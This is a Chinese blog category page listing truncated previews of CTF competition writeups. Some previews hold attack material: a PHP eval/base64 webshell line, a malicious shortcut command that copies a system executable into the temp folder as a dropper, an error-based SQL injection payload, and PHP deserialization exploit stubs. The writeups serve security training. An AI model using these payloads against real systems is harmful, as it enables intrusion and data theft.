比赛wp
文章平均质量分 72
比赛wp
huamanggg
生活不止眼前的苟且
展开
-
2022DASCTF Apr X FATE 防疫挑战赛 WriteUP
文章目录MiscSimpleFlowWebwarmup-phpsoeasy_phpMiscSimpleFlow看流量大概是上传了一个后门,但是会对payload加密,这里发现有flag.txt被打包后面的包里面发现flag.zip但是打开需要密码,那么我们就要回去压缩的地方,看看给的什么密码,所以我们就得解开这个流量@eval(@base64_decode($_POST['m8f8d9db647ecd']));&e57fb9c067c677=o3&g479cf6f058c原创 2022-04-25 18:59:14 · 2296 阅读 · 0 评论 -
[*CTF2022]oh_my_lotto_revenge
New相对于oh_my_lotto,revenge进行了下面的更改这么做,我们能走的就只有RCE了,而这里唯一能操作的一个地方就是这里,可以操作环境变量os.environ[lotto_key] = lotto_value这里有几个非预期解,先看看预期解Intented writeup这里可以操控环境变量,那么我们能做的事情就很多了,预期解是操控HOSTALIASES修改hosts因为他的wget是通过域名下载的os.system('wget --content-disposition原创 2022-04-21 18:58:26 · 2890 阅读 · 1 评论 -
[HMGCTF2022]wp
WEBFan website首先是一个www.zip的源码泄露,是laminas框架mvc的框架首先就是看路由在\module\Album\src\Controller\AlbumController.php里面有功能点<?phpnamespace Album\Controller;use Album\Model\AlbumTable;use Laminas\Mvc\Controller\AbstractActionController;use Laminas\View\Mode原创 2022-03-24 17:58:34 · 4158 阅读 · 0 评论 -
[VNCTF2022]部分wp
VNCTF2022原创 2022-02-23 12:58:54 · 674 阅读 · 0 评论 -
[SCTF2021]Upload_it_1复现闭包组件反序列化rce
题目地址SycloverTeam提供了题目的docker环境https://github.com/SycloverTeam/SCTF2021/tree/master/web/Upload_it_1wp首先题目给了composer.json{ "name": "sctf2021/upload", "authors": [ { "name": "AFKL", "email": "upload@qq.com"原创 2022-02-11 22:44:49 · 3388 阅读 · 0 评论 -
[HWS&DasCTF]misc
babypdf附件是一个快捷方式,但是打开是可以成功的看到pdf的,这就肯定是从外面加载进来的看一下目标%SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y&findstr原创 2022-01-28 18:42:02 · 1076 阅读 · 1 评论 -
[第二届赣网杯]部分wp
第二届赣网杯原创 2021-12-06 23:37:34 · 1910 阅读 · 2 评论 -
[2021极客大挑战]部分wp
Where_is_my_FUMO开局是给了一个反弹shell的命令执行<?phpfunction chijou_kega_no_junnka($str) { $black_list = [">", ";", "|", "{", "}", "/", " "]; return str_replace($black_list, "", $str);}if (isset($_GET['DATA'])) { $data = $_GET['DATA']; $add原创 2021-11-30 08:26:19 · 3798 阅读 · 0 评论 -
[西湖论剑]yuas的秘密wp
yusa的秘密filescan找到了一个contack文件,提示到了便筏dump出便筏的数据文件开一个win7虚拟机,打开便筏数据文件存放的地址C:\Users\Administrator\AppData\Roaming\Microsoft\Sticky Notes导入snt文件,然后看到便筏内容,世界没了心跳试了一轮,这个密码可以打开key.zip里面的内容是from PIL import Imageimport structpic = Image.open('key.bmp'原创 2021-11-22 13:13:34 · 838 阅读 · 1 评论 -
[2021江西省赛高校组]wp
easyphp前端代码泄露foreach ($_POST as $item => $value){ $$item=$$value; $secret = $$item;}foreach ($_GET as $key => $value){ if ($key=='flag'){ $str=$value; $$str=$secret; }}if (isset($hehe)){ echo "<center>"原创 2021-09-28 01:30:27 · 1338 阅读 · 2 评论 -
[2021强网杯青少年]ssrf+fpm
best_php<?phphighlight_file(__FILE__);//like fpm?class Crawl{ public $url; function __construct($url){ if(substr($url,0,7)==="http://"){ $this->url = $url; }else{ $this->url = "http://127.0.0.1/"原创 2021-09-26 17:37:36 · 431 阅读 · 1 评论 -
2021第五空间网络安全大赛
WebFTPhttps://github.com/wifeat/WebFTP根据github的源码,去对网站进行分析,有写到初始账号但是题目改了密码,登不进然后下载到题目的Config.php.bak,看到版本是v2.3出现了git泄漏,无法下载到文件,但是看到了目录结构找到探针http://114.115.185.167:32770/Readme/mytz.phphttp://114.115.185.167:32770/Readme/mytz.php?act=phpinfo直接找到f原创 2021-09-17 17:46:42 · 1223 阅读 · 0 评论 -
[羊城杯2021] wp
baby_volatility直接看镜像文件,查看cmdfilescan找到有一个ssh.txt想到之前搭建博客的时候就接触这个ssh密钥,拿去base64decode找到邮箱,去github找用户在历史commit里面有个这个??RCTF??去分析一下这个__APP__里面有html我直接去kali里面foremost一下打开后找到了一个隐蔽的flag,真难找。。U2FuZ0ZvcntTMF8zYXp5XzJfY3JhY2tfbm9vYl9wbGF5ZXJ9解出签到原创 2021-09-13 23:49:34 · 1308 阅读 · 1 评论 -
[祥云杯2021]几道简单题的wp
ezyiihttps://xz.aliyun.com/t/9948找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子exp<?phpnamespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc原创 2021-08-22 21:42:40 · 4323 阅读 · 15 评论 -
[BUUCTF]刷题记录8
[De1CTF 2019]SSRF Mepython代码审计ssrfhash拓展攻击flask题#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding(原创 2021-08-21 22:36:48 · 281 阅读 · 0 评论 -
[GKCTF2021]复现wp
签到打开流量包,分析http流用python转成字符串import binasciis = '64306c455357644251306c6e51554e4a5a3046355355737764306c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154576c44546d3952524原创 2021-08-21 22:36:12 · 440 阅读 · 0 评论 -
[CTFshow]吃瓜杯复现wp
热身<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num,原创 2021-08-19 00:05:12 · 936 阅读 · 2 评论 -
[CTFshow]吃鸡杯
在?看看密码给了一个vmem文件,内存取证搞密码肯定一开始想到系统用户的密码volatility --profile=Win7SP1x64 -f looklookpassword.vmem hivelistvolatility --profile=Win7SP1x64 -f looklookpassword.vmem hashdump -y 0xfffff8a000024010 -s 0xfffff8a000dd7010找一下竟然没有密码那可能是浏览器里面保存了的密码 volatil原创 2021-08-06 02:50:00 · 1080 阅读 · 0 评论 -
AFCTF校赛
fake留了一个.git文件,我们看一下日志是有两次提交的,有一次是真的flaggit loggit show 版本号我们再使用git show命令来查看内容stolen打开数据包,追踪tcp流首先看到上传了一个一句话木马然后是一个python文件这个python文件把flag的每一位都转化成ascii码再*16*16+1然后发送流给192.168.159.138再往下看,他执行了这个python文件那么就看他的包的内容,全部提取出来在转换成flag第一个果然是26原创 2021-06-05 17:34:22 · 1070 阅读 · 0 评论 -
DozerCTF2021
ezmiscforemost分离,得到一个gif,一个pnggif是很多个二维码,一个个扫就是了得到DozerCTF{is_it_simple再扫一下png,发现就一句话,二维码不可能这么密拉到记事本里面看了一下,这里是一百多列,只是里面的字符我们看不见而已这里就是考察0长度的不可见unicode编码把扫出来的东西保存成文件,用工具还原就可以了ruby zwsp.rb d flag一点也不杂拿到文件有三个f3是base85_good_over}图片是010打开,看末尾的一原创 2021-06-02 10:19:19 · 377 阅读 · 3 评论 -
[Neepuctf2021]wp
一个比较小众的比赛,是别学校的招新赛,不过也对外开放记录一点有点难度的题随便注2.0是原题“[强网杯 2019]随便注”的变式,过滤的很多return preg_match("/select|update|delete|drop|insert|where|rename|set|handler|char|\*| | |\./i",$inject);空格都可以用%0a绕过,但是rename被ban了,改名不能用了,set被过滤,预处理语句也不能用了,handle也不能用了,网上流传的这三个方法都不行原创 2021-05-27 16:14:06 · 385 阅读 · 5 评论 -
2021宁波市第四届网络安全大赛练习赛
签到咯~看响应头Myself~请求头修改php是……~<?phpinclude 'flag.php';extract($_GET);if (!empty($ac)){ $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "&原创 2021-05-23 19:36:11 · 777 阅读 · 1 评论 -
2021宁波市第四届网络安全大赛
简单的php和nepctf那题litter_thick一样的找到有一个flag.php然后写个马进去,cat一下flag.php就可以了?1=echo `cat flag.php`;indexindex.php~有源码 <?phpinclude ("config.php");$db = mysql_connect($dbhost, $dbuser, $dbpass);mysql_select_db($database, $db) or die("Could not selec原创 2021-05-23 19:35:34 · 1171 阅读 · 10 评论 -
[ctfshow]大牛杯
web_checkin<?phperror_reporting(0);include "config.php";//flag in /function check_letter($code){ $letter_blacklist = str_split("abcdefghijklmnopqrstuvwxyz1234567890"); for ($i = 0; $i < count($letter_blacklist); $i+=2){ if (preg原创 2021-05-16 15:04:45 · 991 阅读 · 3 评论 -
[CISCN2021]初赛
easy_sql无列名和报错注入uname=123&passwd=123') AND EXTRACTVALUE(1,CONCAT(0x5e,(select * from (select * from flag as a join flag as b using(no,id))x)))--+出了字段名1d004bae-a9e9-4f4e-8af1-c9518d464307uname=qwe&passwd=') AND EXTRACTVALUE(1,CONCAT(0x5e,(sele原创 2021-05-16 12:39:33 · 2007 阅读 · 5 评论 -
津门杯&红帽杯2021
津门杯power_cut<?phpclass logger{ public $logFile; public $initMsg; public $exitMsg; function __construct($file){ // initialise variables $this->initMsg="#--session started--#\n"; $this->exitMsg="#--session原创 2021-05-09 22:15:29 · 1018 阅读 · 20 评论 -
[cstc2021]wp
RGB给了一堆rgb值,用python把他们写出来from PIL import Imagex = 11*2*2*2*2*2*2y = 41im = Image.new("RGB",(x,y))file = open('code.txt')for i in range(0,x): for j in range(0,y): line = file.readline().rstrip("\n") rgb = line.split("#") im.putpixel(原创 2021-05-06 00:20:44 · 2062 阅读 · 8 评论 -
[ISCC 2021]部分wp
海市蜃楼-1直接改后缀zip,搜flag直接找到Retrieve the passcode给了一堆三维的数据,提到了scatter,所以猜测是利用python来画散点图1:3:1;1.25:3:1;1.5:3:1;1.75:3:1;2:3:1;2:2.75:1;2:2.5:1;2:2.25:1;2:2:1;2:1.75:1;2:1.5:1;1:2.25:1;1.25:2.25:1;1.5:2.25:1;1.75:2.25:1;1:1.5:1;1.25:1.5:1;1.5:1.5:1;1.75:1.5原创 2021-05-05 12:22:26 · 3635 阅读 · 1 评论 -
[MRCTF2021]Web复现ez_larave1
ez_larave1考察的是Laravel的CVE-2019-9081,影响版本为5.7.xget到一个新工具:BeyondCompare,用来比较文件差异的,可以比较方便的看出他做了哪些开发把5.7.x的源码下载下来,比较一下,发现序列化!有个小绕过,在serialize后随便加一点东西就可以了,比如serializeabc与网上的poc不同,他的路由命名为hello了,在hello路由下可以执行反序列化在网上找到的cve复现,看到漏洞是在PendingCommand.php出现的,跑去看原创 2021-04-20 11:10:52 · 935 阅读 · 9 评论 -
[ACTF_Junior_2021] web wp
baby_serialize一题基础的反序列化代码审计,当Username为admin的时候就给flag<?phphighlight_file(__FILE__);include "flag.php";class User{ private $Username = "0xDktb"; private $Password = "0xDktb111"; function __construct(){ $Username = "0xDktb";原创 2021-02-21 23:56:55 · 1616 阅读 · 0 评论 -
[极客大挑战 2019]PHP 1
看他说有备份文件,所以就去扫后台,然后看php代码先看index.php,找到两点信息:第一是get传参,第二是反序列化再看class.php发现里面创建了一个类,当username为admin,password等于100的时候会给flag那现在类都给出了,只需要实例一个对象,username是admin,password是100flag就会被打印出来,记得刚才我们看到get传参后会有一个反序列化,所以我们再把得到的对象序列化一下,用get写在url上,就可以返回出flag了...原创 2021-02-23 21:34:42 · 128 阅读 · 0 评论 -
[杭电Hgame]2021web week2(变量覆盖+多线程条件竞争+sql注入)
LazyDogR4U考察变量覆盖,这篇博客写的很详细首先是源码泄露,www.zip就可以拿到网站文件代码审计如果$_SESSION['username'] === 'admin'就会给flagif($_SESSION['username'] === 'admin'){ echo "<h3 style='color: white'>admin将于今日获取自己忠实的flag</h3>"; echo "<h3 style='color: wh原创 2021-02-15 22:49:02 · 520 阅读 · 3 评论 -
记录一道题(sql注入+ssrf+文件上传)
拿到题目,学长给了hint,代码泄露,可以直接拿御剑扫,也可以在网站后面写/www.zip拿到源代码看了题目后第一层有两个可能,一个是爆破进去,还有一个是sql注入,看源代码里有sql语句的拼接,而且爆破可能性太低,所以选择sql注入sql注入代码审计function escape1($string){ $a = 1; $b = 2; global $link; $string = $link->real_escape_string($string);原创 2021-02-13 00:53:40 · 376 阅读 · 4 评论 -
[红明谷杯]wp(正则注入,hex绕过)
write_shell<?phperror_reporting(0);highlight_file(__FILE__);function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ retur原创 2021-04-03 16:36:19 · 771 阅读 · 0 评论 -
[NepCTF]WEB
梦里花开牡丹亭涉及到:pop链命令执行短字符命令执行反序列化,代码审计<?phphighlight_file(__FILE__);error_reporting(0);include('shell.php');class Game{ public $username; public $password; public $choice; public $register; public $file; public $fi原创 2021-03-23 23:32:48 · 600 阅读 · 0 评论 -
[SUCTF 2019]EasySQL 1
堆叠注入尝试万能密码没用后尝试堆叠注入,就是语句用;隔开返回了所有的库返回了当前库的表查看表Flag的定义的时候失败了select 1 from table这个题目涉及到一个操作select 1 from tableselect 1 from table增加临时列,每行的列值是写在select后的数,这条sql语句中是11是一常量(可以为任意数值)一般是作条件查询用的一般用来当做判断子查询是否成功(即是否有满足条件的时候使用)看了大佬的wp,他们猜出语句大概是这样select原创 2021-01-31 23:10:47 · 747 阅读 · 0 评论 -
[vishwaCTF-2021]wp
Is Js Necessary?打开网页过了一下会重定向,直接保存下html来可以仔细分析直接禁用javascript会有隐藏的提交框出现<form action="https://isjsnecessary.vishwactf.com/" method="post"><input type="text" placeholder="your answer" name="yourinput" id="yourinput"><input type="submit" nam原创 2021-03-15 11:50:34 · 1946 阅读 · 0 评论 -
[NahamconCTF]wp
Homeward Bound添加一个xff头就得到了原创 2021-03-15 11:51:18 · 179 阅读 · 0 评论 -
[UCTF 2021]wp
Source it!js代码直接泄露了 function checkPassword(form) { password1 = form.password1.value; name = form.name.value; var username = "admin"; var hash = "1bea3a3d4bc3be1149a75b33fb8d82bc";原创 2021-03-15 11:51:02 · 279 阅读 · 0 评论 -
[杭电Hgame]2021web week1(请求头+js代码审计+sympy解定积分+已知明文攻击)
F12后有个php文件,这个就是顺风车,但是直接点是打不开的,所以我们尝试抓包改请求头直接把请求的页面换成这个,看响应信息,所请求方法错误,那就换POST呗发现说要什么什么引擎,我还去百度了这个鬼东西,没啥用,估计就是随便找了一个高大上的东西后来想到引擎就想到了User-Agent,改了一下还真是下一步就是改referer了呗然后就是xff了,flag出现...原创 2021-02-02 21:14:26 · 580 阅读 · 2 评论